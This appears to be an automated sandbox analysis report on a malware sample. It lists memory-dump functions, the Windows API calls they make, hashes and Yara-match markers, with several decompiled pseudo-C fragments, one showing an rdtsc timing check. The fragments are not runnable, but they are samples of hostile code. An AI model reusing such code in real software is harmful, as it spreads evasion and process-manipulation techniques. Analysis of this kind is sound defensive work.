Uniqueness Score: -1.00%

Function 0092F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0092F90E

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 0092FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0092FADB

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 0092FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0092FAF3

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 0092FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0092FBC3

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 0092FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0092FB73

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 0092FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0092FC9B

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 0092FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0092FC6B

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 0092FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0092FD9A

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 0092FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0092FDCB

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 0092FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0092FEAB

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 0092FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0092FEDB

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0092FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0092FFBF

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 004088A0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088A0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CC0( &_v284, 0x104);
						E0041A330( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DC0(E00413D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1b5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088ab
0x004088b3
0x004088b5
0x004088ba
0x004088bf
0x004088d2
0x004088d7
0x004088e0
0x004088ec
0x004088ff
0x00408904
0x00408907
0x00408910
0x00408922
0x00408927
0x0040892c
0x00000000
0x00000000
0x0040892e
0x00408932
0x00000000
0x00000000
0x00408934
0x00000000
0x00408932
0x00408936
0x00408939
0x0040893f
0x00408941
0x0040894c
0x00408951
0x00408954
0x00408961
0x0040896c
0x0040896e
0x00408974
0x00408978
0x0040897b
0x0040897b
0x00408982
0x00408985
0x0040898a
0x00408997
0x004088c6
0x004088c6
0x004088c6

Memory Dump Source

Source File: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00418447, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Strings

hA, xrefs: 0041846C, 00418477

Memory Dump Source

Source File: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: hA
API String ID: 1279760036-1221461045
Opcode ID: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
Instruction ID: a92fe9ae98136920995dbb6c9f8f490c0a28fc78c4328f558ebb06bb2a3a51d6
Opcode Fuzzy Hash: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
Instruction Fuzzy Hash: D1F04F763002156FDA24EF99EC84EE7736DEF88360B10855AFA4D9B201D931EA5587E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041852D, Relevance: 3.1, APIs: 2, Instructions: 54processCOMMON

Download Yara Rule

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418528
CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584

Memory Dump Source

Source File: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CreateExitInternal
String ID:
API String ID: 4273315900-0
Opcode ID: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
Instruction ID: 90963e86cd57150ed095c23e32252a4bc52356d2fee715913416bcb79a385e3c
Opcode Fuzzy Hash: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
Instruction Fuzzy Hash: B60117B2200208BBCB44DF99DC80DEB77ADEF8C354F118249FA0D97241DA34E951CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00407260(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t12 = E00409B10(__ebx, __edi, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_push(__edi);
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409270(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407260
0x0040726f
0x00407273
0x0040727e
0x0040728e
0x0040729e
0x004072a3
0x004072aa
0x004072ac
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418530, Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418530(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
				void* _t22;
				void* _t33;
				intOrPtr* _t34;

				_t16 = _a4;
				_t34 = _a4 + 0xc80;
				E00418DB0(_t33, _t16, _t34,  *((intOrPtr*)(_t16 + 0xa14)), 0, 0x37);
				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t22;
			}

0x00418533
0x00418542
0x0041854a
0x00418584
0x00418588

APIs

CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584

Memory Dump Source

Source File: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
Instruction ID: 513559d71bb74bdb0002c37f9039ea76381332b5628ed031e04d017542a4cadc
Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
Instruction Fuzzy Hash: A3015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251DA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004184B4, Relevance: 1.5, APIs: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004184B4(void* __ecx, void* __edx, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t12;

				_push(0x3c);
				 *((intOrPtr*)(__ecx + 0x5506bd67)) =  *((intOrPtr*)(__ecx + 0x5506bd67)) - __edx;
				_t9 = _v0;
				_t5 = _t9 + 0xc74; // 0xc74
				E00418DB0(0x21c5d300, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t12;
			}

0x004184b4
0x004184bb
0x004184c3
0x004184cf
0x004184d7
0x004184ed
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
Instruction ID: c5ff80edf742f8a68fdad7a16a09cf22f23f4b8e9e8c60093caf9f0ba1e94a67
Opcode Fuzzy Hash: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
Instruction Fuzzy Hash: ADE06DB1200304ABDB14DF65DC49EA7376CAF88750F114199FE085B382D531E901CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184cf
0x004184d7
0x004184ed
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00418480(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _t9;
				void* _t10;
				void* _t12;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t9 = _a12;
				_t12 = _a8;
				asm("les edx, [edx+edx*2]");
				_push(_t9);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}

0x00418497
0x0041849f
0x004184a2
0x004184a6
0x004184ab
0x004184ad
0x004184b1

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Memory Dump Source

